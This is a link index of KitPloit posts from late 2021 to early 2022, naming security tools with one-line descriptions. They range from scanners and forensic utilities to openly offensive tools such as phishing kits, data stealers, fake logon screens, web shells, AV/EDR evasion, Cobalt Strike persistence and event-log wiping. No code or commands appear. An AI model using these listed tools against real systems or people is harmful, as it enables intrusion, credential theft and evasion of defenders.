- [Vortex - VPN Overall Reconnaissance, Testing, Enumeration And eXploitation Toolkit](http://www.kitploit.com/2022/03/vortex-vpn-overall-reconnaissance.html)
- [Oh365UserFinder - Python3 O365 User Enumeration Tool](http://www.kitploit.com/2022/03/oh365userfinder-python3-o365-user.html)
- [PSRansom - PowerShell Ransomware Simulator With C2 Server](http://www.kitploit.com/2022/03/psransom-powershell-ransomware.html)
- [S3Sec - Check AWS S3 Instances For Read/Write/Delete Access](http://www.kitploit.com/2022/03/s3sec-check-aws-s3-instances-for.html)
- [Nuclei-Burp-Plugin - Nuclei Plugin For BurpSuite](http://www.kitploit.com/2022/03/nuclei-burp-plugin-nuclei-plugin-for.html)
- [Ghostbuster - Eliminate Dangling Elastic IPs By Performing Analysis On Your Resources Within All Your AWS Accounts](http://www.kitploit.com/2022/03/ghostbuster-eliminate-dangling-elastic.html)
- [S1EM - This Project Is A SIEM With SIRP And Threat Intel, All In One](http://www.kitploit.com/2022/03/s1em-this-project-is-siem-with-sirp-and.html)
- [Epagneul - Graph Visualization For Windows Event Logs](http://www.kitploit.com/2022/03/epagneul-graph-visualization-for.html)
- [Mip22 - An Advanced Phishing Tool](http://www.kitploit.com/2022/03/mip22-advanced-phishing-tool.html)
- [PurplePanda - Identify Privilege Escalation Paths Within And Across Different Clouds](http://www.kitploit.com/2022/03/purplepanda-identify-privilege.html)
- [RefleXXion - A Utility Designed To Aid In Bypassing User-Mode Hooks Utilised By AV/EPP/EDR Etc](http://www.kitploit.com/2022/03/reflexxion-utility-designed-to-aid-in.html)
- [WMEye - A Post Exploitation Tool That Uses WMI Event Filter And MSBuild Execution For Lateral Movement](http://www.kitploit.com/2022/03/wmeye-post-exploitation-tool-that-uses.html)
- [Patching - An Interactive Binary Patching Plugin For IDA Pro](http://www.kitploit.com/2022/03/patching-interactive-binary-patching.html)
- [Lnkbomb - Malicious Shortcut Generator For Collecting NTLM Hashes From Insecure File Shares](http://www.kitploit.com/2022/03/lnkbomb-malicious-shortcut-generator.html)
- [CodeAnalysis - Static Code Analysis](http://www.kitploit.com/2022/03/codeanalysis-static-code-analysis.html)
- [GoodHound - Uses Sharphound, Bloodhound And Neo4j To Produce An Actionable List Of Attack Paths For Targeted Remediation](http://www.kitploit.com/2022/03/goodhound-uses-sharphound-bloodhound.html)
- [Dome - Fast And Reliable Python Script That Makes Active And/Or Passive Scan To Obtain Subdomains And Search For Open Ports](http://www.kitploit.com/2022/03/dome-fast-and-reliable-python-script.html)
- [DomainAlerting - Daily Alert When A New Domain Name Is Registered And Contains Your Keywords](http://www.kitploit.com/2022/03/domainalerting-daily-alert-when-new.html)
- [Codecat v0.56 - An Open-Source Tool To Help You Find/Track User Input Sinks And Security Bugs Using Static Code Analysis](http://www.kitploit.com/2022/03/codecat-v056-open-source-tool-to-help.html)
- [Nivistealer - Steal Victim Images Exact Location Device Info And Much More](http://www.kitploit.com/2022/03/nivistealer-steal-victim-images-exact.html)
- [WSVuls - Website Vulnerability Scanner Detect Issues (Outdated Server Software And Insecure HTTP Headers)](http://www.kitploit.com/2022/03/wsvuls-website-vulnerability-scanner.html)
- [ASSAMEE - Free Advance Encryptor For Anon Cloud](http://www.kitploit.com/2022/03/assamee-free-advance-encryptor-for-anon.html)
- [Scanmycode-Ce - Code Scanning/SAST/Static Analysis/Linting Using Many tools/Scanners With One Report - Scanmycode Community Edition (CE)](http://www.kitploit.com/2022/03/scanmycode-ce-code-scanningsaststatic.html)
- [Master_Librarian - A Simple Tool To Audit Unix/*BSD/Linux System Libraries To Find Public Security Vulnerabilities](http://www.kitploit.com/2022/03/masterlibrarian-simple-tool-to-audit.html)
- [Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases](http://www.kitploit.com/2022/03/geowifi-search-wifi-geolocation-data-by.html)
- [GONET-Scanner - Golang Network Scanner With Arp Discovery And Own Parser](http://www.kitploit.com/2022/03/gonet-scanner-golang-network-scanner.html)
- [GraphQL Cop - Security Auditor Utility For GraphQL APIs](http://www.kitploit.com/2022/03/graphql-cop-security-auditor-utility.html)
- [Fastfuz-Chrome-Ext - Site Fast Fuzzing With Chorme Extension](http://www.kitploit.com/2022/03/fastfuz-chrome-ext-site-fast-fuzzing.html)
- [PwnKit-Exploit - Proof Of Concept (PoC) CVE-2021-4034](http://www.kitploit.com/2022/03/pwnkit-exploit-proof-of-concept-poc-cve.html)
- [Osmedeus - A Workflow Engine For Offensive Security](http://www.kitploit.com/2022/03/osmedeus-workflow-engine-for-offensive.html)
- [PyShell - Multiplatform Python WebShell](http://www.kitploit.com/2022/03/pyshell-multiplatform-python-webshell.html)
- [Authz0 - An Automated Authorization Test Tool. Unauthorized Access Can Be Identified Based On URLs And RolesAnd Credentials](http://www.kitploit.com/2022/03/authz0-automated-authorization-test.html)
- [IOC Scraper - A Fast And Reliable Service That Enables You To Extract IOCs And Intelligence From Different Data Sources](http://www.kitploit.com/2022/03/ioc-scraper-fast-and-reliable-service.html)
- [HaccTheHub - Open Source Self-Hosted Cyber Security Learning Platform](http://www.kitploit.com/2022/03/haccthehub-open-source-self-hosted.html)
- [Ocr-Recon - Tool To Find A Particular String In A List Of URLs Using Tesseract'S OCR (Optical Character Recognition) Capabilities](http://www.kitploit.com/2022/03/ocr-recon-tool-to-find-particular.html)
- [Chaya - Advance Image Steganography](http://www.kitploit.com/2022/03/chaya-advance-image-steganography.html)
- [Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers](http://www.kitploit.com/2022/03/litefuzz-multi-platform-fuzzer-for.html)
- [Searpy - Search Engine Tookit](http://www.kitploit.com/2022/03/searpy-search-engine-tookit.html)
- [CAPEv2 - Malware Configuration And Payload Extraction](http://www.kitploit.com/2022/03/capev2-malware-configuration-and.html)
- [BruteShark - Network Analysis Tool](http://www.kitploit.com/2022/03/bruteshark-network-analysis-tool.html)
- [Checkov - Prevent Cloud Misconfigurations During Build-Time For Terraform, CloudFormation, Kubernetes, Serverless Framework And Other Infrastructure-As-Code-Languages](http://www.kitploit.com/2022/03/checkov-prevent-cloud-misconfigurations.html)
- [DRAKVUF Sandbox - Automated Hypervisor-Level Malware Analysis System](http://www.kitploit.com/2022/02/drakvuf-sandbox-automated-hypervisor.html)
- [StayKit - Cobalt Strike Kit For Persistence](http://www.kitploit.com/2022/02/staykit-cobalt-strike-kit-for.html)
- [Katoolin3 - Get Your Favourite Kali Linux Tools On Debian/Ubuntu/Linux Mint](http://www.kitploit.com/2022/02/katoolin3-get-your-favourite-kali-linux.html)
- [NTLMRecon - Enumerate Information From NTLM Authentication Enabled Web Endpoints](http://www.kitploit.com/2022/02/ntlmrecon-enumerate-information-from.html)
- [openSquat - Detection Of Phishing Domains And Domain Squatting. Supports Permutations Such As Homograph Attack, Typosquatting And Bitsquatting](http://www.kitploit.com/2022/02/opensquat-detection-of-phishing-domains.html)
- [JNDI-Injection-Exploit - A Tool Which Generates JNDI Links Can Start Several Servers To Exploit JNDI Injection Vulnerability](http://www.kitploit.com/2022/02/jndi-injection-exploit-tool-which.html)
- [Win-Brute-Logon - Crack Any Microsoft Windows Users Password Without Any Privilege (Guest Account Included)](http://www.kitploit.com/2022/02/win-brute-logon-crack-any-microsoft.html)
- [Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc](http://www.kitploit.com/2022/02/scylla-simplistic-information-gathering.html)
- [Jatayu - Stealthy Stand Alone PHP Web Shell](http://www.kitploit.com/2022/02/jatayu-stealthy-stand-alone-php-web.html)
- [Chain-Reactor - An Open Source Framework For Composing Executables That Simulate Adversary Behaviors And Techniques On Linux Endpoints](http://www.kitploit.com/2022/02/chain-reactor-open-source-framework-for.html)
- [Voltron - A Hacky Debugger UI For Hackers](http://www.kitploit.com/2022/02/voltron-hacky-debugger-ui-for-hackers.html)
- [SSRFire - An Automated SSRF Finder. Just Give The Domain Name And Your Server And Chill! Also Has Options To Find XSS And Open Redirects](http://www.kitploit.com/2022/02/ssrfire-automated-ssrf-finder-just-give.html)
- [HybridTestFramework - End To End Testing Of Web, API And Security](http://www.kitploit.com/2022/02/hybridtestframework-end-to-end-testing.html)
- [Talisman - By Hooking Into The Pre-Push Hook Provided By Git, Talisman Validates The Outgoing Changeset For Things That Look Suspicious](http://www.kitploit.com/2022/02/talisman-by-hooking-into-pre-push-hook.html)
- [SharpCookieMonster - Extracts Cookies From Chrome](http://www.kitploit.com/2022/02/sharpcookiemonster-extracts-cookies.html)
- [Boko - Application Hijack Scanner For macOS](http://www.kitploit.com/2022/02/boko-application-hijack-scanner-for.html)
- [Njsscan - A Semantic Aware SAST Tool That Can Find Insecure Code Patterns In Your Node.js Applications](http://www.kitploit.com/2022/02/njsscan-semantic-aware-sast-tool-that.html)
- [Snaffler - A Tool For Pentesters To Help Find Delicious Candy](http://www.kitploit.com/2022/02/snaffler-tool-for-pentesters-to-help.html)
- [Macrome - Excel Macro Document Reader/Writer For Red Teamers And Analysts](http://www.kitploit.com/2022/02/macrome-excel-macro-document.html)
- [FakeLogonScreen - Fake Windows Logon Screen To Steal Passwords](http://www.kitploit.com/2022/02/fakelogonscreen-fake-windows-logon.html)
- [Kali Linux 2022.1 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/02/kali-linux-20221-penetration-testing.html)
- [Shellcodetester - An Application To Test Windows And Linux Shellcodes](http://www.kitploit.com/2022/02/shellcodetester-application-to-test.html)
- [Flare-Qdb - Command-line And Python Debugger For Instrumenting And Modifying Native Software Behavior On Windows And Linux](http://www.kitploit.com/2022/02/flare-qdb-command-line-and-python.html)
- [Droopescan - A Plugin-Based Scanner That Aids Security Researchers In Identifying Issues With Several CMSs, Mainly Drupal And Silverstripe](http://www.kitploit.com/2022/02/droopescan-plugin-based-scanner-that.html)
- [Autotimeliner - Automagically Extract Forensic Timeline From Volatile Memory Dump](http://www.kitploit.com/2022/02/autotimeliner-automagically-extract.html)
- [Exrop - Automatic ROP Chain Generation](http://www.kitploit.com/2022/02/exrop-automatic-rop-chain-generation.html)
- [Get-RBCD-Threaded - Tool To Discover Resource-Based Constrained Delegation Attack Paths In Active Directory Environments](http://www.kitploit.com/2022/02/get-rbcd-threaded-tool-to-discover.html)
- [truffleHog - Searches Through Git Repositories For High Entropy Strings And Secrets, Digging Deep Into Commit History](http://www.kitploit.com/2022/02/trufflehog-searches-through-git.html)
- [Cloudsploit - Cloud Security Posture Management (CSPM)](http://www.kitploit.com/2022/02/cloudsploit-cloud-security-posture.html)
- [Dive - A Tool For Exploring Each Layer In A Docker Image](http://www.kitploit.com/2022/02/dive-tool-for-exploring-each-layer-in.html)
- [TerraGoat - Vulnerable Terraform Infrastructure](http://www.kitploit.com/2022/02/terragoat-vulnerable-terraform.html)
- [Php-Malware-Finder - Detect Potentially Malicious PHP Files](http://www.kitploit.com/2022/02/php-malware-finder-detect-potentially.html)
- [LDAP-Password-Hunter - Password Hunter In The LDAP Infamous Database](http://www.kitploit.com/2022/02/ldap-password-hunter-password-hunter-in.html)
- [AWS-Loot - Pull Secrets From An AWS Environment](http://www.kitploit.com/2022/02/aws-loot-pull-secrets-from-aws.html)
- [Wslu - A Collection Of Utilities For Windows 10 Linux Subsystems](http://www.kitploit.com/2022/02/wslu-collection-of-utilities-for.html)
- [EDRHunt - Scan Installed EDRs And AVs On Windows](http://www.kitploit.com/2022/02/edrhunt-scan-installed-edrs-and-avs-on.html)
- [SocialPwned - An OSINT Tool That Allows To Get The Emails, From A Target, Published In Social Networks Such As Instagram, Linkedin And Twitter To Find Possible Credentials Leaks In PwnDB Or Dehashed And Obtain Google Account Information Via GHunt](http://www.kitploit.com/2022/02/socialpwned-osint-tool-that-allows-to.html)
- [Instaloctrack - An Instagram OSINT Tool To Collect All The Geotagged Locations Available On An Instagram Profile In Order To Plot Them On A Map, And Dump Them In A JSON](http://www.kitploit.com/2022/02/instaloctrack-instagram-osint-tool-to.html)
- [Invoke-EDRChecker - Checks Running Processes, Process Metadata, Dlls Loaded Into Your Current Process And The Each DLLs Metadata, Common Install Directories, Installed Services, The Registry And Running Drivers For The Presence Of Known Defensive Products Such As AV's, EDR's And Logging Tools](http://www.kitploit.com/2022/02/invoke-edrchecker-checks-running.html)
- [Espionage - A Network Packet And Traffic Interceptor For Linux. Spoof ARP And Wiretap A Network](http://www.kitploit.com/2022/02/espionage-network-packet-and-traffic.html)
- [IDACode - An Integration For IDA And VS Code Which Connects Both To Easily Execute And Debug IDAPython Scripts](http://www.kitploit.com/2022/02/idacode-integration-for-ida-and-vs-code.html)
- [SentryPeer - A Distributed Peer To Peer List Of Bad Actor IP Addresses And Phone Numbers Collected Via A SIP Honeypot](http://www.kitploit.com/2022/02/sentrypeer-distributed-peer-to-peer.html)
- [SMBSR - Lookup For Interesting Stuff In SMB Shares](http://www.kitploit.com/2022/02/smbsr-lookup-for-interesting-stuff-in.html)
- [SQLRecon - A C# MS SQL Toolkit Designed For Offensive Reconnaissance And Post-Exploitation](http://www.kitploit.com/2022/02/sqlrecon-c-ms-sql-toolkit-designed-for.html)
- [Elfloader - An Architecture-Agnostic ELF File Flattener For Shellcode](http://www.kitploit.com/2022/02/elfloader-architecture-agnostic-elf.html)
- [wmiexec-RegOut - Modify Version Of Impacket Wmiexec.Py, Get Output(Data,Response) From Registry, Don'T Need SMB Connection, Also Bypassing Antivirus-Software In Lateral Movement Like WMIHACKER](http://www.kitploit.com/2022/02/wmiexec-regout-modify-version-of.html)
- [Heaptrace - Helps Visualize Heap Operations For Pwn And Debugging](http://www.kitploit.com/2022/02/heaptrace-helps-visualize-heap.html)
- [Phant0m - Windows Event Log Killer](http://www.kitploit.com/2022/02/phant0m-windows-event-log-killer.html)
- [Ipsourcebypass - This Python Script Can Be Used To Bypass IP Source Restrictions Using HTTP Headers](http://www.kitploit.com/2022/02/ipsourcebypass-this-python-script-can.html)
- [Rathole - A Lightweight, Stable And High-Performance Reverse Proxy For NAT Traversal, Written In Rust. An Alternative To Frp And Ngrok](http://www.kitploit.com/2022/02/rathole-lightweight-stable-and-high.html)
- [RecoverPy - Interactively Find And Recover Deleted Or Overwritten Files From Your Terminal](http://www.kitploit.com/2022/01/recoverpy-interactively-find-and.html)
- [Bluffy - Convert Shellcode Into Different Formats!](http://www.kitploit.com/2022/01/bluffy-convert-shellcode-into-different.html)
- [Kerbrute - An Script To Perform Kerberos Bruteforcing By Using Impacket](http://www.kitploit.com/2022/01/kerbrute-script-to-perform-kerberos.html)
- [CRT - CrowdStrike Reporting Tool for Azure](http://www.kitploit.com/2022/01/crt-crowdstrike-reporting-tool-for-azure.html)
- [Mininode - A CLI Tool To Reduce The Attack Surface Of The Node.js Applications By Using Static Analysis](http://www.kitploit.com/2022/01/mininode-cli-tool-to-reduce-attack.html)
- [Combobulator - Framework To Detect And Prevent Dependency Confusion Leakage And Potential Attacks](http://www.kitploit.com/2022/01/combobulator-framework-to-detect-and.html)
- [Gh-Dork - Github Dorking Tool](http://www.kitploit.com/2022/01/gh-dork-github-dorking-tool.html)
- [BloodyAD - An Active Directory Privilege Escalation Framework](http://www.kitploit.com/2022/01/bloodyad-active-directory-privilege.html)
- [Ninjasworkout - Vulnerable NodeJS Web Application](http://www.kitploit.com/2022/01/ninjasworkout-vulnerable-nodejs-web.html)
- [Xolo - Tool To Crawl, Visualize And Interact With SQL Server Links In A D3 Graph](http://www.kitploit.com/2022/01/xolo-tool-to-crawl-visualize-and.html)
- [Dontgo403 - Tool To Bypass 40X Response Codes](http://www.kitploit.com/2022/01/dontgo403-tool-to-bypass-40x-response.html)
- [FACT - A Tool To Collect, Process And Visualise Forensic Data From Clusters Of Machines Running In The Cloud Or On-Premise](http://www.kitploit.com/2022/01/fact-tool-to-collect-process-and.html)
- [Http2Smugl - Tool to detect and exploit HTTP request smuggling in cases it can be achieved via HTTP/2 -> HTTP/1.1 conversion](http://www.kitploit.com/2022/01/http2smugl-tool-to-detect-and-exploit.html)
- [VulnLab - A Web Vulnerability Lab Project](http://www.kitploit.com/2022/01/vulnlab-web-vulnerability-lab-project.html)
- [SpoofThatMail - Bash Script To Check If A Domain Or List Of Domains Can Be Spoofed Based In DMARC Records](http://www.kitploit.com/2022/01/spoofthatmail-bash-script-to-check-if.html)
- [Whatfiles - Log What Files Are Accessed By Any Linux Process](http://www.kitploit.com/2022/01/whatfiles-log-what-files-are-accessed.html)
- [Second-Order - Subdomain Takeover Scanner](http://www.kitploit.com/2022/01/second-order-subdomain-takeover-scanner.html)
- [Mandiant-Azure-AD-Investigator - PowerShell module for detecting artifacts that may be indicators of UNC2452 and other threat actor activity](http://www.kitploit.com/2022/01/mandiant-azure-ad-investigator.html)
- [Pwndora - Massive IPv4 Scanner, Find And Analyze Internet-Connected Devices In Minutes, Create Your Own IoT Search Engine At Home](http://www.kitploit.com/2022/01/pwndora-massive-ipv4-scanner-find-and.html)
- [T-Reqs-HTTP-Fuzzer - A Grammar-Based HTTP Fuzzer](http://www.kitploit.com/2022/01/t-reqs-http-fuzzer-grammar-based-http.html)
- [Wireshark-Forensics-Plugin - A cross-platform Wireshark plugin that correlates network traffic data with threat intelligence, asset categorization & vulnerability data](http://www.kitploit.com/2022/01/wireshark-forensics-plugin-cross.html)
- [Dep-Scan - Fully Open-Source Security Audit For Project Dependencies Based On Known Vulnerabilities And Advisories. Supports Both Local Repos And Container Images. Integrates With Various CI Environments Such As Azure Pipelines, CircleCI, Google CloudBuild](http://www.kitploit.com/2022/01/dep-scan-fully-open-source-security.html)
- [Http-Desync-Guardian - Analyze HTTP Requests To Minimize Risks Of HTTP Desync Attacks (Precursor For HTTP Request Smuggling/Splitting)](http://www.kitploit.com/2022/01/http-desync-guardian-analyze-http.html)
- [Pip-Audit - Audits Python Environments And Dependency Trees For Known Vulnerabilities](http://www.kitploit.com/2022/01/pip-audit-audits-python-environments.html)
- [goCabrito - Super Organized And Flexible Script For Sending Phishing Campaigns](http://www.kitploit.com/2022/01/gocabrito-super-organized-and-flexible.html)
- [Driftwood - Private Key Usage Verification](http://www.kitploit.com/2022/01/driftwood-private-key-usage-verification.html)
- [reFlutter - Flutter Reverse Engineering Framework](http://www.kitploit.com/2022/01/reflutter-flutter-reverse-engineering.html)
- [Inject-Assembly - Inject .NET Assemblies Into An Existing Process](http://www.kitploit.com/2022/01/inject-assembly-inject-net-assemblies.html)
- [Registry-Spy - Cross-platform Registry Browser For Raw Windows Registry Files](http://www.kitploit.com/2022/01/registry-spy-cross-platform-registry.html)
- [TokenUniverse - An Advanced Tool For Working With Access Tokens And Windows Security Policy](http://www.kitploit.com/2022/01/tokenuniverse-advanced-tool-for-working.html)
- [Iptable_Evil - An Evil Bit Backdoor For Iptables](http://www.kitploit.com/2022/01/iptableevil-evil-bit-backdoor-for.html)
- [Narthex - Modular Personalized Dictionary Generator](http://www.kitploit.com/2022/01/narthex-modular-personalized-dictionary.html)
- [Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures](http://www.kitploit.com/2022/01/espoofer-email-spoofing-testing-tool.html)
- [Raven - Advanced Cyber Threat Map (Simplified, Customizable, Responsive)](http://www.kitploit.com/2022/01/raven-advanced-cyber-threat-map.html)
- [AlphaGolang - IDApython Scripts For Analyzing Golang Binaries](http://www.kitploit.com/2022/01/alphagolang-idapython-scripts-for.html)
- [Scemu - X86 32bits Emulator, For Securely Emulating Shellcodes](http://www.kitploit.com/2022/01/scemu-x86-32bits-emulator-for-securely.html)
- [Wifi-Framework - Wi-Fi Framework For Creating Proof-Of-Concepts, Automated Experiments, Test Suites, Fuzzers, And More...](http://www.kitploit.com/2022/01/wifi-framework-wi-fi-framework-for.html)
- [RAUDI - A Repo To Automatically Generate And Keep Updated A Series Of Docker Images Through GitHub Actions](http://www.kitploit.com/2022/01/raudi-repo-to-automatically-generate.html)
- [SpoofThatMail - Bash Script To Check If A Domain Or List Of Domains Can Be Spoofed Based In DMARC Records](http://www.kitploit.com/2022/01/spoofthatmail-bash-script-to-check-if.html)
- [WannaRace - WebApp Intentionally Made Vulnerable To Race Condition For Practicing Race Condition](http://www.kitploit.com/2022/01/wannarace-webapp-intentionally-made.html)
- [PasteMonitor - Scrape Pastebin API To Collect Daily Pastes, Setup A Wordlist And Be Alerted By Email When You Have A Match](http://www.kitploit.com/2022/01/pastemonitor-scrape-pastebin-api-to.html)
- [LACheck - Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration](http://www.kitploit.com/2022/01/lacheck-multithreaded-c-net-assembly.html)
- [Shellcode-Encryptor - A Simple Shell Code Encryptor/Decryptor/Executor To Bypass Anti Virus](http://www.kitploit.com/2022/01/shellcode-encryptor-simple-shell-code.html)
- [RCLocals - Linux Startup Analyzer](http://www.kitploit.com/2022/01/rclocals-linux-startup-analyzer.html)
- [Mortar - Evasion Technique To Defeat And Divert Detection And Prevention Of Security Products (AV/EDR/XDR)](http://www.kitploit.com/2022/01/mortar-evasion-technique-to-defeat-and.html)
- [Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreading](http://www.kitploit.com/2022/01/log4j-detect-script-to-detect-log4j.html)
- [Rustpad - Multi-Threaded Padding Oracle Attacks Against Any Service](http://www.kitploit.com/2022/01/rustpad-multi-threaded-padding-oracle.html)
- [SyntheticSun - A Defense-In-Depth Security Automation And Monitoring Framework Which Utilizes Threat Intelligence, Machine Learning, Managed AWS Security Services And, Serverless Technologies To Continuously Prevent, Detect And Respond To Threats](http://www.kitploit.com/2022/01/syntheticsun-defense-in-depth-security.html)
- [RPC Firewall - Stopping Lateral Movement via the RPC Firewall](http://www.kitploit.com/2022/01/rpc-firewall-stopping-lateral-movement.html)
- [Msmailprobe - Office 365 And Exchange Enumeration](http://www.kitploit.com/2022/01/msmailprobe-office-365-and-exchange.html)
- [Lsarelayx - NTLM Relaying For Windows Made Easy](http://www.kitploit.com/2022/01/lsarelayx-ntlm-relaying-for-windows.html)
- [RiotPot - Resilient IoT And Operational Technology Honeypot](http://www.kitploit.com/2022/01/riotpot-resilient-iot-and-operational.html)
- [Skrull - A Malware DRM, That Prevents Automatic Sample Submission By AV/EDR And Signature Scanning From Kernel](http://www.kitploit.com/2022/01/skrull-malware-drm-that-prevents.html)
- [PMAT-labs - Labs For Practical Malware Analysis And Triage](http://www.kitploit.com/2022/01/pmat-labs-labs-for-practical-malware.html)
- [Top 20 Most Popular Hacking Tools in 2021](http://www.kitploit.com/2021/12/top-20-most-popular-hacking-tools-in.html)
- [Top 20 Most Popular Hacking Tools in 2021](http://www.kitploit.com/2021/12/top-20-most-popular-hacking-tools-in.html)
- [ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan](http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html)
- [Snap-Scraper - Snap Scraper Enables Users To Download Media Uploaded To Snapchat's Snap Map Using A Set Of Latitude And Longitude Coordinates](http://www.kitploit.com/2021/12/snap-scraper-snap-scraper-enables-users.html)
- [SourceLeakHacker - A Multi Threads Web Application Source Leak Scanner](http://www.kitploit.com/2021/12/sourceleakhacker-multi-threads-web.html)
- [Onionservice - Manage Your Onion Services Via CLI Or TUI On Unix-like Operating System With A POSIX Compliant Shell](http://www.kitploit.com/2021/12/onionservice-manage-your-onion-services.html)
- [NimHollow - Nim Implementation Of Process Hollowing Using Syscalls (PoC)](http://www.kitploit.com/2021/12/nimhollow-nim-implementation-of-process.html)
- [Spamscanner - Spam Scanner Is The Best Anti-Spam, Email Filtering, And Phishing Prevention Service](http://www.kitploit.com/2021/12/spamscanner-spam-scanner-is-best-anti.html)
- [Spray365 - Makes Spraying Microsoft Accounts (Office 365 / Azure AD) Easy Through Its Customizable Two-Step Password Spraying Approach](http://www.kitploit.com/2021/12/spray365-makes-spraying-microsoft.html)
- [SQLbit - Just Another Script For Automatize Boolean-Based Blind SQL Injections](http://www.kitploit.com/2021/12/sqlbit-just-another-script-for.html)
- [MultiPotato - Another Potato to get SYSTEM via SeImpersonate privileges](http://www.kitploit.com/2021/12/multipotato-another-potato-to-get.html)
- [TrojanSourceFinder - Help Find Trojan Source Vulnerability In Code](http://www.kitploit.com/2021/12/trojansourcefinder-help-find-trojan.html)
- [Umay - IoT Malware Similarity Analysis Platform](http://www.kitploit.com/2021/12/umay-iot-malware-similarity-analysis.html)
- [MUI - A GUI Plugin For Binary Ninja To Easily Interact With And View The Progress Of Manticore](http://www.kitploit.com/2021/12/mui-gui-plugin-for-binary-ninja-to.html)
- [Web Cache Vulnerability Scanner - A Go-based CLI Tool For Testing For Web Cache Poisoning](http://www.kitploit.com/2021/12/web-cache-vulnerability-scanner-go.html)
- [Mesh-Kridik - An Open-Source Security Checker That Performs Various Security Checks On A Kubernetes Cluster With Istio Service Mesh And Is Leveraged By OPA (Open Policy Agent) To Enforce Security Rules](http://www.kitploit.com/2021/12/mesh-kridik-open-source-security.html)
- [Mariana Trench - Security Focused Static Analysis Tool For Android And Java Applications](http://www.kitploit.com/2021/12/mariana-trench-security-focused-static.html)
- [log4j-scan - A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts](http://www.kitploit.com/2021/12/log4j-scan-fully-automated-accurate-and.html)
- [Log4J-Detector - Detects Log4J versions on your file-system within any application that are vulnerable to CVE-2021-44228 and CVE-2021-45046](http://www.kitploit.com/2021/12/log4j-detector-detects-log4j-versions.html)
- [Jektor - A Windows User-Mode Shellcode Execution Tool That Demonstrates Various Techniques That Malware Uses](http://www.kitploit.com/2021/12/jektor-windows-user-mode-shellcode.html)
- [Haptyc - Test Generation Framework](http://www.kitploit.com/2021/12/haptyc-test-generation-framework.html)
- [FiddleZAP - A Simplified Version Of EKFiddle For OWASP ZAP](http://www.kitploit.com/2021/12/fiddlezap-simplified-version-of.html)
- [CloudSpec - An Open Source Tool For Validating Your Resources In Your Cloud Providers Using A Logical Language](http://www.kitploit.com/2021/12/cloudspec-open-source-tool-for.html)
- [CaptfEncoder - An Extensible Cross Platform Network Security Tool Suite](http://www.kitploit.com/2021/12/captfencoder-extensible-cross-platform.html)
- [ADenum - A Pentesting Tool That Allows To Find Misconfiguration Through The The Protocol LDAP And Exploit Some Of Those Weaknesses With Kerberos](http://www.kitploit.com/2021/12/adenum-pentesting-tool-that-allows-to.html)
- [Tarian - Antivirus for Kubernetes](http://www.kitploit.com/2021/12/tarian-antivirus-for-kubernetes.html)
- [DInjector - Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL](http://www.kitploit.com/2021/12/dinjector-collection-of-shellcode.html)
- [AFLTriage - Tool To Triage Crashing Input Files Using A Debugger](http://www.kitploit.com/2021/12/afltriage-tool-to-triage-crashing-input.html)
- [O365Spray - Username Enumeration And Password Spraying Tool Aimed At Microsoft O365](http://www.kitploit.com/2021/12/o365spray-username-enumeration-and.html)
- [SMBeagle - Fileshare Auditing Tool That Hunts Out All Files It Can See In The Network And Reports If The File Can Be Read And/Or Written](http://www.kitploit.com/2021/12/smbeagle-fileshare-auditing-tool-that.html)
- [Fileless-Xec - Stealth Dropper Executing Remote Binaries Without Dropping Them On Disk](http://www.kitploit.com/2021/12/fileless-xec-stealth-dropper-executing.html)
- [KaliIntelligenceSuite - Shall Aid In The Fast, Autonomous, Central, And Comprehensive Collection Of Intelligence By Executing Standard Penetration Testing Tools](http://www.kitploit.com/2021/12/kaliintelligencesuite-shall-aid-in-fast.html)
- [Swurg - Parse OpenAPI Documents Into Burp Suite For Automating OpenAPI-based APIs Security Assessments](http://www.kitploit.com/2021/12/swurg-parse-openapi-documents-into-burp.html)
- [STEWS - A Security Tool For Enumerating WebSockets](http://www.kitploit.com/2021/12/stews-security-tool-for-enumerating.html)
- [Toutatis - A Tool That Allows You To Extract Information From Instagrams Accounts Such As E-Mails, Phone Numbers And More](http://www.kitploit.com/2021/12/toutatis-tool-that-allows-you-to.html)
- [Forbidden - Bypass 4Xx HTTP Response Status Codes](http://www.kitploit.com/2021/12/forbidden-bypass-4xx-http-response.html)
- [AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed Client-Server Architecture](http://www.kitploit.com/2021/12/airstrike-automatically-grab-and-crack.html)
- [IAM Vulnerable - Use Terraform To Create Your Own Vulnerable By Design AWS IAM Privilege Escalation Playground](http://www.kitploit.com/2021/12/iam-vulnerable-use-terraform-to-create.html)
- [DLLHijackingScanner - This Is A PoC For Bypassing UAC Using DLL Hijacking And Abusing The "Trusted Directories" Verification](http://www.kitploit.com/2021/12/dllhijackingscanner-this-is-poc-for.html)
- [IDA2Obj - Static Binary Instrumentation](http://www.kitploit.com/2021/12/ida2obj-static-binary-instrumentation.html)
- [ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI](http://www.kitploit.com/2021/12/clusterfuzzlite-simple-continuous.html)
- [Crawpy - Yet Another Content Discovery Tool](http://www.kitploit.com/2021/12/crawpy-yet-another-content-discovery.html)
- [Kerberoast - Kerberoast Attack -Pure Python-](http://www.kitploit.com/2021/12/kerberoast-kerberoast-attack-pure-python.html)
- [ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan](http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html)
- [XC - A Small Reverse Shell For Linux And Windows](http://www.kitploit.com/2021/12/xc-small-reverse-shell-for-linux-and.html)
- [ZipExec - A Unique Technique To Execute Binaries From A Password Protected Zip](http://www.kitploit.com/2021/11/zipexec-unique-technique-to-execute.html)
- [Kit_Hunter - A Basic Phishing Kit Scanner For Dedicated And Semi-Dedicated Hosting](http://www.kitploit.com/2021/11/kithunter-basic-phishing-kit-scanner.html)
